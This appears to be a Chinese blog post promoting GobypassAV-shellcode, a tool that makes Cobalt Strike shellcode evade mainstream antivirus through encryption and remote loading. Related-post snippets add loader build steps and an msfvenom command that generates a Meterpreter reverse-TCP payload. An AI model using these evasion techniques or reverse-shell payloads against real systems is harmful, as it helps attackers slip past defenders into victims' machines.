探索GobypassAV-shellcode:新一代的CobaltStrike免杀技术

于 2024-05-18 10:06:51 发布
阅读量254 收藏 7
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00004/article/details/139020843
版权

探索GobypassAV-shellcode:新一代的CobaltStrike免杀技术

项目地址:https://gitcode.com/Pizz33/GobypassAV-shellcode

项目介绍

在网络安全领域,绕过杀毒软件的检测是一项关键技能。GobypassAV-shellcode是一个开源项目,专注于Cobalt Strike的免杀技术。该项目提供了一种方法,能够有效地避开包括火绒、360系列、Defender在内的主流杀软的查杀,以实现更加隐蔽和持久的网络渗透测试。

项目技术分析

GobypassAV-shellcode的核心在于shellcode的处理。它将shellcode编码写入文件可能会触发杀软的特征匹配,因此项目采用远程加载的方式,通过Go语言和Python脚本对shellcode进行加密,增加了免杀的难度。此外,项目还提供了详细的对抗策略,针对不同杀毒软件的特性,如360的云查杀和Defender的新规则,进行了巧妙的规避。

技术亮点

  • 加密shellcode:项目提供两种加密手段,Go run encode.go 和 Python xor64.py,提高了壳码的混淆程度。
  • 动态加载:利用Go编程语言,实现shellcode的动态加载,降低被检测的风险。
  • 免杀技巧:适应不同的杀软策略,例如针对360核晶的避免进程注入,以及Defender的Stageless和sleep_mask参数优化。

项目及技术应用场景

GobypassAV-shellcode适用于以下场景:

  • 网络安全研究人员:希望探索如何在复杂的安全环境中保持隐形。
  • 企业安全团队:进行内部渗透测试,评估防御体系的有效性。
  • 红队操作:提高攻击行动的隐蔽性和持久性。

项目特点

  1. 广泛的兼容性:成功绕过了多种主流杀毒软件,包括火绒、360系列和Microsoft Defender。
  2. 详细教程:项目作者提供了详细的博客教程,易于理解和实践。
  3. 灵活的加载方式:支持本地解密和远程加载,可根据实际情况调整C2通信策略。
  4. 持续更新:随着杀毒软件的升级,项目会不断优化免杀策略,保证其有效性。
  5. 社区支持:该项目受到多个开源项目启发,并且积极回馈社区,促进了安全领域的知识共享。

通过GobypassAV-shellcode,您可以体验到更高级别的免杀技术和渗透测试策略。不论是作为学习工具还是实战应用,这个项目都值得您深入了解和尝试。为了您的系统安全,请确保合法合规地使用此项目。

Star History Chart

立即访问项目链接,开始您的免杀之旅!

https://github.com/Pizz33/GobypassAV-shellcode

项目地址:https://gitcode.com/Pizz33/GobypassAV-shellcode

gitblog_00004
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
go混淆实现bypassAV(cobaltstrike免杀
qq_32445755的博客
02-09 888
近两年随着hw和红蓝对抗的增多,接触到的提权、内网渗透、域渗透也越来越多。攻击能力有没有提升不知道,但防护水平明显感觉提升了一大截,先不说防护人员的技术水平如果,最起码各种云WAF、防火墙、隔离设备部署的多了,服务器上也经常能见到安装了杀软、软waf、agent等等,特别是某数字杀软在国内服务器上尤为普及。这个时候,不会点免杀技术就非常吃亏了。
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
lza20001103的博客
09-04 2265
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具一、声明二、测试环境三、生成Msf_Payload四、生成CobaltStrike_Payload五、加密Payload六、配置ShellCode加载器七、打包可执行程序(EXE编译环境)八、上线测试 ShellCode_Loader - Msf&amp
FSharp-Shellcode:F#实现生成shellcode
05-15
FSharp-Shellcode 用法 如果编译为32位,则替换为32位shellcode;如果编译为64位,则替换为64位。 VT 1/66的体面费率,仅由CrowdStrike Falcon启发式算法标记
Doge-Loader:GoGolang的Cobalt Strike Shellcode Loader
04-13
:frog:Frog For Automatic Scan :dog_face:Doge For Defense Evasion&Offensive Security Doge-Loader Cobalt Strike Shellcode Loader by Golang 本项目感谢朋友gd, skate_zhu的帮助 此项目不进行后续更新,详见衍生新项目 :dog_face:Doge-Loader 本项目主要作用为Cobalt Strikeshellcode加载器 编译:go build -gcflags=-trimpath=$GOPATH -asmflags=-trimpath=$GOPATH -ldflags "-w -s -H windowsgui" 项目结构如下: main.go 主程序,用于远程下载shellcode并加载(需要自行上传shellcode(bin文件)并且修改源码里的url等参数) xor.go 异或编码
rust-windows-shellcode:Rust中的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法来自的项目 。 如何建造 (仅在Win10 x64上测试过) 构建shellcode二进制文件 rustup default nightly-x86_64-pc-windows-msvc cd shellcode/ cargo build --release 如果一切顺利,我们将获得shellcode\target\x86_64-pc-windows-msvc\release\shellcode.exe 转储.text部分并做一些补丁 我们在.text部分的开头打补丁,使其跳转到入口点。 这样,我们可以在合并部分中存储一些字符串
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
AES-PowerShellCode:适用于Cobalt Strike的AES Powershell有效负载的独立版本
03-08
AES-PowerShellCode 适用于Cobalt Strike的AES Powershell有效负载的独立版本。 用法 将payload.bin原始shellcode文件放在同一目录中。 默认体系结构是x86 运行python obfuscate.py 默认输出为out.ps1
shellcode免杀工具Go_Bypass的使用
热门推荐
江左盟的博客
02-28 2万+
简介 该工具是由Arks7使用Go语言开发的一个免杀生成器模板,目前可以过国内主流杀毒。 GitHub地址: https://github.com/Arks7/Go_Bypass 用法 使用CobaltStrike生成payload,输出格式为Raw,4.3版本需要勾选X64,如图: 将生成的文件放在Go_Bypass项目目录下,然后执行go env -w GOPROXY=https://goproxy.io,direct配置代理,否则编译报错。然后运行go run main.go,使用默认配置一路回车即
cobaltstrikeshellcode免杀
qq_45414878的博客
02-02 1724
本项目是基于学习shellcode原理和免杀基础而编写,利用加密、缩小体积、混淆等方式绕过检测,主要是为了应付火绒和360。
Cobalt Strike免杀(完结)
qq_32445755的博客
04-18 644
多字节 XOR 或 AES 加密的 shellcode 生成payload 环境 linux python2 工具ShellcodeWrapper 查看python位置 python -c "import sys; print sys.executable" pip2 安装 # 安装setuptools wget https://pypi.python.org/packages/source/s/setuptools/setuptools-18.5.tar.gz tar ..
CobaltStrike二次开发环境准备以及免杀
r250414958的博客
05-08 6661
文章目录前言一、环境二、过程1.注册Idea2.原版CobaltStrike3.开始反编译4.新建项目5.配置项目6.去除暗桩7.免杀CobaltStrike免杀其他免杀profile file重写Stager和Beacon参考总结 前言 原版的CobaltStrike已经被各大杀毒软件给标记了,就算变换profile,stage和beacon也存在着许多特征,所以只能想办法来隐藏和去除,二次编译CobaltStrike就是一个很好的办法。 一、环境 win7_x64 jdk-11.0.14 Idea.2
基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
05-31
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
六一儿童节快乐!(六一儿童节庆祝代码)Vue开发
05-31
六一儿童节快乐!(六一儿童节庆祝代码)Vue开发 like Project setup npm install Compiles and hot-reloads for development npm run serve Compiles and minifies for production npm run build Lints and fixes files npm run lint Customize configuration
uniapp聊天工具源码.zip
05-31
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
NX二次开发uc1603 函数介绍
05-31
NX二次开发uc1603 函数介绍,Ufun提供了一系列丰富的 API 函数,可以帮助用户实现自动化、定制化和扩展 NX 软件的功能。无论您是从事机械设计、制造、模具设计、逆向工程、CAE 分析等领域的专业人士,还是希望提高工作效率的普通用户,NX 二次开发 Ufun 都可以帮助您实现更高效的工作流程。函数覆盖了 NX 软件的各个方面,包括但不限于建模、装配、制图、编程、仿真等。这些 API 函数可以帮助用户轻松地实现自动化、定制化和扩展 NX 软件的功能。例如,用户可以通过 Ufun 编写脚本,自动化完成重复性的设计任务,提高设计效率;或者开发定制化的功能,满足特定的业务需求。语法简单易懂,易于学习和使用。用户可以快速上手并开发出符合自己需求的 NX 功能。本资源内容 提供了丰富的中英文帮助文档,可以帮助用户快速了解和使用 Ufun 的功能。用户可以通过资源中的提示,学习如何使用 Ufun 的 API 函数,以及如何实现特定的功能。
【目标检测数据集】遥感类军用飞机检测数据集3800张20类别VOC+YOLO格式.zip
05-31
【目标检测数据集】遥感类军用飞机检测数据集3800张20类别VOC+YOLO格式.zip 数据集格式:Pascal VOC格式+YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数):3821 标注数量(xml文件个数):3821 标注数量(txt文件个数):3821 标注类别数:20 标注类别名称:["A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20"] 每个类别标注的框数: A1 框数 = 1646 A2 框数 = 1726 A3 框数 = 1164 A4 框数 = 642 A5 框数 = 1262 A6 框数 = 436 A7 框数 = 680 A8 框数 = 944 A9 框数 = 1073 A10 框数 = 924 A11 框数 = 501 A12 框数 = 702 A13 框数 = 1652 A14 框数 = 177
grpcio-1.64.0-cp38-cp38-win_amd64.whl
最新发布
05-31
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
Kan网络pytorch的实现
05-31
权重替换:KAN网络通过将权重参数替换为可学习的单变量函数,提高了网络的性能和可解释性。这种设计使得KAN网络在准确性和可解释性方面优于传统的多层感知器(MLP)。 激活函数位置:与传统的MLP不同,KAN网络中的激活函数位于网络的“边”(即权重)上,而不是节点上。这使得KAN网络能够更灵活地调整每个连接上的激活函数,从而提高模型的表示能力。 非线性核函数:KAN网络可以使用非线性核函数来替代MLP“边”上的线性函数,进一步增强了模型的非线性处理能力。 逼近精度:KAN网络可以设定细粒度的结点(Knot)来提高逼近精度,这使得KAN网络在处理复杂任务时能够获得更高的准确度。 KAN网络的数学理论基础主要来自于Kolmogorov-Arnold表示定理。该定理指出,任意一个多变量连续函数都可以表示为有限数量的单变量连续函数的两层嵌套加法的形式。KAN网络正是基于这一定理,通过将多元函数的学习转化为对一组单变量函数的学习,提高了模型的表达能力和计算效率。
Cobalt Strike 免杀 python
07-20
对于 Cobalt Strike免杀技术,目前有很多方法可以实现。以下是一种使用 Python 的方法: 1. 首先,使用 Python 的 PyInstaller 或者 Py2exe 等工具将 Cobalt Strike 的主程序进行打包成可执行文件。 2. 接下来,可以使用 PyArmor 或者 Cython 等工具对可执行文件进行加密和混淆,增加反编译难度。 3. 使用 Pyinstaller 的 --onefile 参数,将所有依赖库打包到一个单独的可执行文件中,减少被杀软件检测到的可能性。 4. 通过修改 Cobalt Strike 的代码,或者使用其他的代码混淆工具进行代码混淆,使其难以被静态分析。 5. 可以使用 Shellcode 或者 Reflective DLL Injection 等技术Cobalt Strike 主程序加载到内存中运行,避免在磁盘上留下可疑的文件。 6. 可以使用加壳工具对 Cobalt Strike 进行加壳,增加静态分析和动态分析的难度。 需要注意的是,免杀技术并不能保证绝对的免杀效果,因为杀软厂商会不断更新他们的规则和算法。因此,保持及时更新和使用多种免杀技术组合的方法是更可靠的选择。同时,请遵守法律法规,合法使用相关技术

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gitblog_00004

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值